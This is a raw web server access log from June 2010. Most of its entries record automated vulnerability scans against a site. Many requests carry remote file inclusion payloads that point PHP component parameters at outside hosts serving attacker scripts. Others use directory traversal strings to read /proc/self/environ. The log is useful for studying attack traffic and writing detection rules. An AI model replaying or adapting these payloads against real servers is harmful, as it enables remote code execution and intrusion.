69.175.59.242 - - [23/Jun/2010:07:10:12 -0400] "GET /logs/access_log.Q110021000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
121.78.118.123 - - [23/Jun/2010:07:10:13 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
74.55.238.226 - - [23/Jun/2010:07:10:13 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:13 -0400] "GET /logs/access_log.Q109071600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:13 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:13 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:13 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:13 -0400] "GET /logs/access_log.Q109071600%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:13 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:10:17 -0400] "GET /logs/access_log.Q110021000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:17 -0400] "GET /logs/access_log.Q109071600%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:17 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:17 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:10:19 -0400] "GET /logs/access_log.Q110011300///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:19 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:10:32 -0400] "GET /logs/access_log.Q110011300///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:10:34 -0400] "GET /logs/access_log.Q110011300///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
114.108.151.149 - - [23/Jun/2010:07:10:35 -0400] "GET /logs/access_log.Q109070700//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
114.108.151.149 - - [23/Jun/2010:07:10:35 -0400] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
114.108.151.149 - - [23/Jun/2010:07:10:36 -0400] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
74.55.238.226 - - [23/Jun/2010:07:10:47 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:47 -0400] "GET /logs/access_log.Q109071600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:48 -0400] "GET /logs/access_log.Q109071600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:48 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:48 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:48 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:49 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:49 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:49 -0400] "GET /logs/access_log.Q109071600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:52 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:52 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:52 -0400] "GET /logs/access_log.Q109071600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:52 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
121.78.118.123 - - [23/Jun/2010:07:10:59 -0400] "GET /logs/access_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
74.55.238.226 - - [23/Jun/2010:07:11:00 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:11:02 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:11:15 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
114.108.151.149 - - [23/Jun/2010:07:11:28 -0400] "GET /logs/access_log.Q109070700//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
114.108.151.149 - - [23/Jun/2010:07:11:28 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
114.108.151.149 - - [23/Jun/2010:07:11:29 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:11:48 -0400] "GET /logs/access_log.Q110050800/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
163.20.26.5 - - [23/Jun/2010:07:11:52 -0400] "GET /logs/access_log.Q110061200//index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
172.16.1.87 - - [23/Jun/2010:07:12:02 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [23/Jun/2010:07:12:02 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [23/Jun/2010:07:12:02 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
64.8.98.179 - - [23/Jun/2010:07:12:12 -0400] "GET /logs/access_log.Q110012000//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.prietenii.ger.ro/forum/momok.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
64.8.98.179 - - [23/Jun/2010:07:12:12 -0400] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.prietenii.ger.ro/forum/momok.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
64.8.98.179 - - [23/Jun/2010:07:12:12 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.prietenii.ger.ro/forum/momok.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
74.55.238.226 - - [23/Jun/2010:07:12:55 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:12:55 -0400] "GET /logs/access_log.Q109071600%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:12:55 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:12:57 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:12:57 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:12:57 -0400] "GET /logs/access_log.Q109071600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:13:05 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
64.8.98.179 - - [23/Jun/2010:07:13:13 -0400] "GET /logs/access_log.Q110021300//common/include.php?path[docroot]=http://www.prietenii.ger.ro/forum/momok.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
64.8.98.179 - - [23/Jun/2010:07:13:13 -0400] "GET //common/include.php?path[docroot]=http://www.prietenii.ger.ro/forum/momok.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
64.8.98.179 - - [23/Jun/2010:07:13:13 -0400] "GET /logs//common/include.php?path[docroot]=http://www.prietenii.ger.ro/forum/momok.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
74.54.22.2 - - [23/Jun/2010:07:13:26 -0400] "GET /logs/access_log.Q110053100/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:13:26 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:13:26 -0400] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
64.8.98.179 - - [23/Jun/2010:07:13:34 -0400] "GET /logs/error_log.Q110021300//common/include.php?path[docroot]=http://www.prietenii.ger.ro/forum/momok.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
72.14.193.1 - - [23/Jun/2010:07:13:17 -0400] "GET /logs/access_log.Q109122800 HTTP/1.1" 200 4221547 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp),gzip(gfe) (via docs.google.com/viewer)"
66.249.71.209 - - [23/Jun/2010:07:14:05 -0400] "GET /logs/error_log.Q110052400 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.209 - - [23/Jun/2010:07:14:06 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0178D7563D81F900E15B051+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.15.152.183 - - [23/Jun/2010:07:14:17 -0400] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
163.20.26.5 - - [23/Jun/2010:07:14:23 -0400] "GET //index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
74.55.238.226 - - [23/Jun/2010:07:14:44 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:14:44 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.9.205.39 - - [23/Jun/2010:07:14:46 -0400] "GET /logs/access_log.Q110021300//common/include.php?path[docroot]=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
74.9.205.39 - - [23/Jun/2010:07:14:47 -0400] "GET //common/include.php?path[docroot]=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
74.9.205.39 - - [23/Jun/2010:07:14:47 -0400] "GET /logs//common/include.php?path[docroot]=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
74.9.205.39 - - [23/Jun/2010:07:15:10 -0400] "GET /logs/error_log.Q110021300//common/include.php?path[docroot]=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
74.55.238.226 - - [23/Jun/2010:07:15:10 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:15:11 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:15:14 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:15:14 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:15:14 -0400] "GET /logs/access_log.Q110021700/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:15:16 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:15:16 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:15:17 -0400] "GET /logs/access_log.Q109100200/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
91.121.31.161 - - [23/Jun/2010:07:15:18 -0400] "GET /logs/access_log.Q110052700/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:07:15:18 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
91.121.31.161 - - [23/Jun/2010:07:15:18 -0400] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
74.55.238.226 - - [23/Jun/2010:07:15:20 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:15:20 -0400] "GET /logs/access_log.Q110021700/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:15:22 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
219.117.255.170 - - [23/Jun/2010:07:15:27 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
209.59.12.99 - - [23/Jun/2010:07:15:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.108.151.149 - - [23/Jun/2010:07:15:29 -0400] "GET /logs/access_log.Q110022700//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
74.55.238.226 - - [23/Jun/2010:07:15:33 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:15:33 -0400] "GET /logs/access_log.Q110021700/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:15:33 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:15:37 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:15:37 -0400] "GET /logs/access_log.Q109100200/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:15:37 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
114.108.151.149 - - [23/Jun/2010:07:16:06 -0400] "GET /logs/access_log.Q110022700//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.121.31.161 - - [23/Jun/2010:07:16:07 -0400] "GET /logs/access_log.Q109080300/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
64.8.98.179 - - [23/Jun/2010:07:16:16 -0400] "GET /logs/error_log.Q109101400//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.prietenii.ger.ro/forum/momok.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
95.108.245.251 - - [23/Jun/2010:07:15:43 -0400] "GET /logs/access_log.Q110032400 HTTP/1.1" 200 5953826 "-" "Yandex/1.01.001 (compatible; Win16; I)"
64.91.250.11 - - [23/Jun/2010:07:16:41 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:16:41 -0400] "GET /logs/error_log.Q110061000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:16:41 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:16:41 -0400] "GET /logs/access_log.Q110061000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.8.98.179 - - [23/Jun/2010:07:17:01 -0400] "GET /logs/access_log.Q109061100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.prietenii.ger.ro/forum/momok.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
64.8.98.179 - - [23/Jun/2010:07:17:01 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.prietenii.ger.ro/forum/momok.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
64.8.98.179 - - [23/Jun/2010:07:17:01 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.prietenii.ger.ro/forum/momok.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
64.8.98.179 - - [23/Jun/2010:07:17:28 -0400] "GET //common/include.php?path[docroot]=http://www.prietenii.ger.ro/forum/momok.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
64.91.250.11 - - [23/Jun/2010:07:17:34 -0400] "GET /logs/error_log.Q110061000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:17:34 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:17:34 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:17:35 -0400] "GET /logs/access_log.Q110061000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.71.245.122 - - [23/Jun/2010:07:17:37 -0400] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
74.54.22.2 - - [23/Jun/2010:07:17:45 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
67.15.152.183 - - [23/Jun/2010:07:17:47 -0400] "GET /logs/error_log.Q110053000/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
67.15.152.183 - - [23/Jun/2010:07:17:47 -0400] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.152.183 - - [23/Jun/2010:07:17:48 -0400] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
67.15.152.183 - - [23/Jun/2010:07:18:12 -0400] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.152.183 - - [23/Jun/2010:07:18:17 -0400] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
74.54.22.2 - - [23/Jun/2010:07:18:22 -0400] "GET /logs/access_log.Q110053100/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
